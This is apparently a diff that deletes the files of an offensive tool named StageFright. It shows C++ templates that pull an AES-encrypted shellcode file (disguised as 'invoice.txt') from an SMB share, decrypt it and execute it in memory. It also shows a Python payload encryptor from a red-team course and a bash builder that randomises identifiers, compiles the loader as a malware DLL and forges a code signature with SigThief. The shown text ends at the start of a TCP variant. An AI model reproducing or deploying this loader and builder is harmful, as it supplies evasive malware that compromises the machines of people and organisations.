-    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
-    if (hThread == NULL) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    ULONG suspendCount = ResumeThread(hThread);
-    if (suspendCount == (DWORD)-1) {
-        CloseHandle(hThread);
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    WaitForSingleObject(hThread, INFINITE);
-
-    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
-    status = pNtClose(hThread);
-
-    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-    status = pNtFreeVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        MEM_RELEASE);
-
-    return TRUE;
-}
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
-    PBYTE BinaryData = (PBYTE)lpParameter;
-    typedef void (*FunctionPointer)();
-    FunctionPointer pFunction = (FunctionPointer)BinaryData;
-
-    pFunction();
-
-    return 0;
-}
-
-int Random3(char* Random4, unsigned int Random5, char* Random6, size_t Random6len) {
-    HCRYPTPROV hProv;
-    HCRYPTHASH hHash;
-    HCRYPTKEY hKey;
-
-    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
-        return -1;
-    }
-    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
-        return -1;
-    }
-    if (!CryptHashData(hHash, (BYTE*)Random6, (DWORD)Random6len, 0)) {
-        return -1;
-    }
-    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
-        return -1;
-    }
-
-    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &Random5)) {
-        return -1;
-    }
-
-    CryptReleaseContext(hProv, 0);
-    CryptDestroyHash(hHash);
-    CryptDestroyKey(hKey);
-
-    return 0;
-}
-
-char Random7[] = KEYVALUE
-
-int main() {
-    LPCWSTR szServer = L"HOSTNAME";
-    LPCWSTR szFilePath = L"SHAREFOLDER\\SHELLCODEFILE";
-
-    PBYTE Random8;
-    SIZE_T Random8Size;
-
-    BOOL success = Random1(szServer, szFilePath, &Random8, &Random8Size);
-
-    if (success) {
-        Random3((char*)Random8, Random8Size, Random7, sizeof(Random7));
-
-        success = Random2(Random8, Random8Size);
-
-        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-        SIZE_T regionSize = Random8Size;
-        NTSTATUS status = pNtFreeVirtualMemory(
-            GetCurrentProcess(),
-            (PVOID*)&Random8,
-            &regionSize,
-            MEM_RELEASE);
-
-        LocalFree(Random8);
-    }
-
-    return success ? 0 : 1;
-}
-

StageFright/StageFright/StageFright/SMBDLL/Resources/aesencrypt.py

@@ -1,26 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with AES
-# 
-# author: reenz0h (twitter: @SEKTOR7net)
-
-import sys
-from base64 import b64encode
-from Crypto.Cipher import AES
-from Crypto.Util.Padding import pad
-from Crypto.Random import get_random_bytes
-import hashlib
-
-KEY = get_random_bytes(16)
-iv = 16 * b'\x00'
-cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
-
-try:
-    plaintext = open(sys.argv[1], "rb").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
-
-print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
-print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/SMBDLL/Resources/template.cpp

@@ -1,252 +0,0 @@
-#include <windows.h>
-#include <winternl.h>
-#include <wchar.h>
-#include <winternl.h>
-#include <winbase.h>
-#include <winnt.h>
-#include <fileapi.h>
-#include <stdio.h>
-#include <stdint.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#include <psapi.h>
-#include <tlhelp32.h>
-
-#pragma comment(lib, "crypt32.lib")
-#pragma comment(lib, "advapi32.lib")
-
-#ifndef NTSTATUS
-typedef LONG NTSTATUS;
-#endif
-
-#ifndef NT_SUCCESS
-#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
-#endif
-
-typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    ULONG_PTR ZeroBits,
-    PSIZE_T RegionSize,
-    ULONG AllocationType,
-    ULONG Protect);
-
-typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG FreeType);
-
-typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG NewProtect,
-    PULONG OldProtect);
-
-typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
-    OUT PHANDLE ThreadHandle,
-    IN ACCESS_MASK DesiredAccess,
-    IN LPVOID ObjectAttributes,
-    IN HANDLE ProcessHandle,
-    IN LPTHREAD_START_ROUTINE StartAddress,
-    IN LPVOID Parameter,
-    IN BOOL CreateSuspended,
-    IN ULONG StackZeroBits,
-    IN ULONG SizeOfStackCommit,
-    IN ULONG SizeOfStackReserve,
-    OUT LPVOID BytesBuffer);
-
-typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
-    HANDLE ObjectHandle,
-    BOOLEAN Alertable,
-    PLARGE_INTEGER Timeout);
-
-typedef NTSTATUS(WINAPI* _NtClose)(
-    HANDLE Handle);
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter);
-
-void PrintError(const wchar_t* action) {}
-
-BOOL ohztCLrjKceS(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
-    BOOL operationSuccess = TRUE;
-    PBYTE allocatedMemory = NULL;
-
-    WCHAR szFullUNCPath[MAX_PATH];
-    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
-
-    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-    if (hFile == INVALID_HANDLE_VALUE) {
-        operationSuccess = FALSE;
-    }
-    else {
-        DWORD fileSize = GetFileSize(hFile, NULL);
-        if (fileSize == INVALID_FILE_SIZE) {
-            operationSuccess = FALSE;
-        }
-        else {
-            SIZE_T allocationSize = fileSize;
-
-            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
-            NTSTATUS status = pNtAllocateVirtualMemory(
-                GetCurrentProcess(),
-                (PVOID*)&allocatedMemory,
-                0,
-                &allocationSize,
-                MEM_COMMIT | MEM_RESERVE,
-                PAGE_READWRITE);
-
-            if (!NT_SUCCESS(status)) {
-                operationSuccess = FALSE;
-            }
-            else {
-                DWORD bytesRead;
-                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
-                    operationSuccess = FALSE;
-                }
-
-                *binaryData = allocatedMemory;
-                *binarySize = bytesRead;
-            }
-        }
-
-        CloseHandle(hFile);
-    }
-
-    return operationSuccess;
-}
-
-BOOL EpKOpQRlB(const PBYTE BinaryData, SIZE_T DataSize) {
-    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-    if (pMemory == NULL) {
-        return FALSE;
-    }
-
-    memcpy(pMemory, BinaryData, DataSize);
-
-    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
-    SIZE_T regionSize = DataSize;
-    ULONG oldProtect;
-    NTSTATUS status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_NOACCESS,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_EXECUTE_READ,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
-    if (hThread == NULL) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    ULONG suspendCount = ResumeThread(hThread);
-    if (suspendCount == (DWORD)-1) {
-        CloseHandle(hThread);
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    WaitForSingleObject(hThread, INFINITE);
-
-    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
-    status = pNtClose(hThread);
-
-    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-    status = pNtFreeVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        MEM_RELEASE);
-
-    return TRUE;
-}
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
-    PBYTE BinaryData = (PBYTE)lpParameter;
-    typedef void (*FunctionPointer)();
-    FunctionPointer pFunction = (FunctionPointer)BinaryData;
-
-    pFunction();
-
-    return 0;
-}
-
-int rABIYwtsiD(char* Random4, unsigned int zHUdE, char* nPincKr, size_t nPincKrlen) {
-    HCRYPTPROV hProv;
-    HCRYPTHASH hHash;
-    HCRYPTKEY hKey;
-
-    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
-        return -1;
-    }
-    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
-        return -1;
-    }
-    if (!CryptHashData(hHash, (BYTE*)nPincKr, (DWORD)nPincKrlen, 0)) {
-        return -1;
-    }
-    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
-        return -1;
-    }
-
-    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &zHUdE)) {
-        return -1;
-    }
-
-    CryptReleaseContext(hProv, 0);
-    CryptDestroyHash(hHash);
-    CryptDestroyKey(hKey);
-
-    return 0;
-}
-
-char VTOBIBvhNOZy[] =  { 0xa4, 0x49, 0xc1, 0x91, 0xfc, 0x7a, 0x55, 0x44, 0x92, 0x9a, 0xab, 0x5d, 0xb, 0x95, 0x2e, 0xd6 };
-
-extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
-    LPCWSTR szServer = L"Win11Blue";
-    LPCWSTR szFilePath = L"Shared\\invoice.txt";
-
-    PBYTE ymluXTmiPBZPy;
-    SIZE_T ymluXTmiPBZPySize;
-
-    BOOL success = ohztCLrjKceS(szServer, szFilePath, &ymluXTmiPBZPy, &ymluXTmiPBZPySize);
-
-    if (success) {
-        rABIYwtsiD((char*)ymluXTmiPBZPy, ymluXTmiPBZPySize, VTOBIBvhNOZy, sizeof(VTOBIBvhNOZy));
-
-        success = EpKOpQRlB(ymluXTmiPBZPy, ymluXTmiPBZPySize);
-
-        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-        SIZE_T regionSize = ymluXTmiPBZPySize;
-        NTSTATUS status = pNtFreeVirtualMemory(
-            GetCurrentProcess(),
-            (PVOID*)&ymluXTmiPBZPy,
-            &regionSize,
-            MEM_RELEASE);
-
-        LocalFree(ymluXTmiPBZPy);
-    }
-
-    return success ? 0 : 1;
-}
-

StageFright/StageFright/StageFright/SMBDLL/SMBDLL.sh

@@ -1,181 +0,0 @@
-#!/bin/bash
-
-# Color variables
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-cat << "EOF"          
-
- _____ _                       _   ________  _________  ______ _      _     
-/  ___| |                     | | /  ___|  \/  || ___ \ |  _  \ |    | |    
-\ `--.| |_ __ _  __ _  ___  __| | \ `--.| .  . || |_/ / | | | | |    | |    
- `--. \ __/ _` |/ _` |/ _ \/ _` |  `--. \ |\/| || ___ \ | | | | |    | |    
-/\__/ / || (_| | (_| |  __/ (_| | /\__/ / |  | || |_/ / | |/ /| |____| |____
-\____/ \__\__,_|\__, |\___|\__,_| \____/\_|  |_/\____/  |___/ \_____/\_____/
-                 __/ |                                                      
-                |___/                                                       
-
-EOF
-
-echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
-echo ""
-read Shellcode
-echo ""
-echo -e ${green}"What's The Hostname Of Your Target? ex: Win11Wkstn"${clear}
-echo ""
-read HOSTNAME
-echo ""
-echo -e ${green}"Enter The Share Name You're Hosting Your Shellcode From'. ex: CorporateShare"${clear}
-echo ""
-read SHAREFOLDER
-echo ""
-echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
-echo ""
-read SHELLCODEFILE
-echo ""
-echo -e ${green}"Name Your Entry Point Function"${clear}
-echo ""
-read ENTRYPOINT
-echo ""
-echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
-echo ""
-read MALWARE
-echo ""
-cp StageFright/SMBDLL/template.cpp StageFright/SMBDLL/Resources/template.cpp
-echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
-echo ""
-sleep 2
-python3 StageFright/SMBDLL/Resources/aesencrypt.py $Shellcode > shell.txt
-echo -e ${yellow}"***Encryption Completed***"${clear}
-echo ""
-cp shell.txt shell2.txt
-
-#Generate AES Key
-keys=$(cat "shell2.txt")
-cut -d 'p' -f1 shell2.txt > shell3.txt
-keys=$(cat shell3.txt)
-keysnow=${keys#*=}
-sed -i "s/KEYVALUE/$keysnow/g" StageFright/SMBDLL/Resources/template.cpp
-
-#Generate AES Payload
-payload=$(cat "shell.txt")
-payloadnow=${payload#*;}
-payloadtoday=${payloadnow#*=}
-echo $payloadtoday > shell5.txt
-cp StageFright/SMBDLL/conv.py StageFright/SMBDLL/Resources/con.py
-perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/SMBDLL/Resources/con.py
-sed -i "s/{/[/g" -i StageFright/SMBDLL/Resources/con.py
-sed -i "s/}/]/g" -i StageFright/SMBDLL/Resources/con.py
-sed -i "s/;//g" -i StageFright/SMBDLL/Resources/con.py
-python3 StageFright/SMBDLL/Resources/con.py
-#rm StageFright/SMBDLL/Resources/con.py
-mv payload.bin $SHELLCODEFILE
-sleep 2
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomE=$(cat shell.txt)
-sed -i "s/RandomE/$RandomE/g" StageFright/SMBDLL/Resources/template.cpp
-
-
-#Replace IP, PORT and SHELLCODEFILE
-sed -i "s/ENTRYPOINT/$ENTRYPOINT/g" StageFright/SMBDLL/Resources/template.cpp
-sed -i "s/SHAREFOLDER/$SHAREFOLDER/g" StageFright/SMBDLL/Resources/template.cpp
-sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/SMBDLL/Resources/template.cpp
-sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/SMBDLL/Resources/template.cpp
-#Replacing Values
-
-# Get Payload From URL Function
-
-#FindShare
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random1=$(cat shell.txt)
-sed -i "s/Random1/$Random1/g" StageFright/SMBDLL/Resources/template.cpp
-
-#pPayloadBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-Random2=$(cat shell.txt)
-sed -i "s/Random2/$Random2/g" StageFright/SMBDLL/Resources/template.cpp
-
-#sPayloadSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random3=$(cat shell.txt)
-sed -i "s/Random3/$Random3/g" StageFright/SMBDLL/Resources/template.cpp
-
-#bSTATE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
-Random5=$(cat shell.txt)
-sed -i "s/Random5/$Random5/g" StageFright/SMBDLL/Resources/template.cpp
-
-#sSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
-Random6=$(cat shell.txt)
-sed -i "s/Random6/$Random6/g" StageFright/SMBDLL/Resources/template.cpp
-
-#hInternet
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random7=$(cat shell.txt)
-sed -i "s/Random7/$Random7/g" StageFright/SMBDLL/Resources/template.cpp
-
-#dwBytesRead
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
-Random8=$(cat shell.txt)
-sed -i "s/Random8/$Random8/g" StageFright/SMBDLL/Resources/template.cpp
-
-#pBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random9=$(cat shell.txt)
-sed -i "s/Random9/$Random9/g" StageFright/SMBDLL/Resources/template.cpp
-
-#PAYLOAD
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomA=$(cat shell.txt)
-sed -i "s/RandomA/$RandomA/g" StageFright/SMBDLL/Resources/template.cpp
-
-#Sleep Function
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomJ=$(cat shell.txt)
-sed -i "s/RandomJ/$RandomJ/g" StageFright/SMBDLL/Resources/template.cpp
-
-#AES KEY NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-RandomK=$(cat shell.txt)
-sed -i "s/RandomK/$RandomK/g" StageFright/SMBDLL/Resources/template.cpp
-
-# Main Function
-
-#Bytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomB=$(cat shell.txt)
-sed -i "s/RandomB/$RandomB/g" StageFright/SMBDLL/Resources/template.cpp
-
-#Size
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomC=$(cat shell.txt)
-sed -i "s/RandomC/$RandomC/g" StageFright/SMBDLL/Resources/template.cpp
-
-#Compile
-
-echo -e ${yellow}"+++Compiling Malware+++"${clear}
-x86_64-w64-mingw32-g++ -shared -o $MALWARE StageFright/SMBDLL/Resources/template.cpp -lws2_32 -lntdll -static-libgcc -static-libstdc++ -Wl,--subsystem,windows -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
-echo ""
-sleep 2
-rm shell*
-echo -e ${yellow}"***Malware Compiled***"${clear}
-echo ""
-sleep 2
-echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
-echo ""
-sleep 2
-python3 python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
-mv signed$MALWARE $MALWARE
-echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
-echo ""
-
-
-

StageFright/StageFright/StageFright/SMBDLL/conv.py

@@ -1,4 +0,0 @@
-buf=PAYVAL 
-payload = bytes(bytearray(buf))
-with open('payload.bin', 'wb') as f:
-    f.write(payload)

StageFright/StageFright/StageFright/SMBDLL/template.cpp

@@ -1,252 +0,0 @@
-#include <windows.h>
-#include <winternl.h>
-#include <wchar.h>
-#include <winternl.h>
-#include <winbase.h>
-#include <winnt.h>
-#include <fileapi.h>
-#include <stdio.h>
-#include <stdint.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#include <psapi.h>
-#include <tlhelp32.h>
-
-#pragma comment(lib, "crypt32.lib")
-#pragma comment(lib, "advapi32.lib")
-
-#ifndef NTSTATUS
-typedef LONG NTSTATUS;
-#endif
-
-#ifndef NT_SUCCESS
-#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
-#endif
-
-typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    ULONG_PTR ZeroBits,
-    PSIZE_T RegionSize,
-    ULONG AllocationType,
-    ULONG Protect);
-
-typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG FreeType);
-
-typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG NewProtect,
-    PULONG OldProtect);
-
-typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
-    OUT PHANDLE ThreadHandle,
-    IN ACCESS_MASK DesiredAccess,
-    IN LPVOID ObjectAttributes,
-    IN HANDLE ProcessHandle,
-    IN LPTHREAD_START_ROUTINE StartAddress,
-    IN LPVOID Parameter,
-    IN BOOL CreateSuspended,
-    IN ULONG StackZeroBits,
-    IN ULONG SizeOfStackCommit,
-    IN ULONG SizeOfStackReserve,
-    OUT LPVOID BytesBuffer);
-
-typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
-    HANDLE ObjectHandle,
-    BOOLEAN Alertable,
-    PLARGE_INTEGER Timeout);
-
-typedef NTSTATUS(WINAPI* _NtClose)(
-    HANDLE Handle);
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter);
-
-void PrintError(const wchar_t* action) {}
-
-BOOL Random1(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
-    BOOL operationSuccess = TRUE;
-    PBYTE allocatedMemory = NULL;
-
-    WCHAR szFullUNCPath[MAX_PATH];
-    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
-
-    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-    if (hFile == INVALID_HANDLE_VALUE) {
-        operationSuccess = FALSE;
-    }
-    else {
-        DWORD fileSize = GetFileSize(hFile, NULL);
-        if (fileSize == INVALID_FILE_SIZE) {
-            operationSuccess = FALSE;
-        }
-        else {
-            SIZE_T allocationSize = fileSize;
-
-            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
-            NTSTATUS status = pNtAllocateVirtualMemory(
-                GetCurrentProcess(),
-                (PVOID*)&allocatedMemory,
-                0,
-                &allocationSize,
-                MEM_COMMIT | MEM_RESERVE,
-                PAGE_READWRITE);
-
-            if (!NT_SUCCESS(status)) {
-                operationSuccess = FALSE;
-            }
-            else {
-                DWORD bytesRead;
-                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
-                    operationSuccess = FALSE;
-                }
-
-                *binaryData = allocatedMemory;
-                *binarySize = bytesRead;
-            }
-        }
-
-        CloseHandle(hFile);
-    }
-
-    return operationSuccess;
-}
-
-BOOL Random2(const PBYTE BinaryData, SIZE_T DataSize) {
-    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-    if (pMemory == NULL) {
-        return FALSE;
-    }
-
-    memcpy(pMemory, BinaryData, DataSize);
-
-    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
-    SIZE_T regionSize = DataSize;
-    ULONG oldProtect;
-    NTSTATUS status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_NOACCESS,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_EXECUTE_READ,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
-    if (hThread == NULL) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    ULONG suspendCount = ResumeThread(hThread);
-    if (suspendCount == (DWORD)-1) {
-        CloseHandle(hThread);
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    WaitForSingleObject(hThread, INFINITE);
-
-    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
-    status = pNtClose(hThread);
-
-    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-    status = pNtFreeVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        MEM_RELEASE);
-
-    return TRUE;
-}
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
-    PBYTE BinaryData = (PBYTE)lpParameter;
-    typedef void (*FunctionPointer)();
-    FunctionPointer pFunction = (FunctionPointer)BinaryData;
-
-    pFunction();
-
-    return 0;
-}
-
-int Random3(char* Random4, unsigned int Random5, char* Random6, size_t Random6len) {
-    HCRYPTPROV hProv;
-    HCRYPTHASH hHash;
-    HCRYPTKEY hKey;
-
-    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
-        return -1;
-    }
-    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
-        return -1;
-    }
-    if (!CryptHashData(hHash, (BYTE*)Random6, (DWORD)Random6len, 0)) {
-        return -1;
-    }
-    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
-        return -1;
-    }
-
-    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &Random5)) {
-        return -1;
-    }
-
-    CryptReleaseContext(hProv, 0);
-    CryptDestroyHash(hHash);
-    CryptDestroyKey(hKey);
-
-    return 0;
-}
-
-char Random7[] = KEYVALUE
-
-extern "C" void CALLBACK ENTRYPOINT(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
-    LPCWSTR szServer = L"HOSTNAME";
-    LPCWSTR szFilePath = L"SHAREFOLDER\\SHELLCODEFILE";
-
-    PBYTE Random8;
-    SIZE_T Random8Size;
-
-    BOOL success = Random1(szServer, szFilePath, &Random8, &Random8Size);
-
-    if (success) {
-        Random3((char*)Random8, Random8Size, Random7, sizeof(Random7));
-
-        success = Random2(Random8, Random8Size);
-
-        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-        SIZE_T regionSize = Random8Size;
-        NTSTATUS status = pNtFreeVirtualMemory(
-            GetCurrentProcess(),
-            (PVOID*)&Random8,
-            &regionSize,
-            MEM_RELEASE);
-
-        LocalFree(Random8);
-    }
-
-    return success ? 0 : 1;
-}
-

StageFright/StageFright/StageFright/TCP/Resources/aesencrypt.py

@@ -1,26 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with AES
-# 
-# author: reenz0h (twitter: @SEKTOR7net)
-
-import sys
-from base64 import b64encode
-from Crypto.Cipher import AES
-from Crypto.Util.Padding import pad
-from Crypto.Random import get_random_bytes
-import hashlib
-
-KEY = get_random_bytes(16)
-iv = 16 * b'\x00'
-cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
-
-try:
-    plaintext = open(sys.argv[1], "rb").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
-
-print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
-print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/TCP/Resources/template.cpp

@@ -1,188 +0,0 @@
-#include <winsock2.h>
-#include <ws2tcpip.h>
-#include <windows.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#pragma comment (lib, "crypt32.lib")
-#pragma comment (lib, "advapi32")
-#include <psapi.h>
-
-// Define the shellcode function signature
-typedef void (*zhCAcpCedgP)();
-
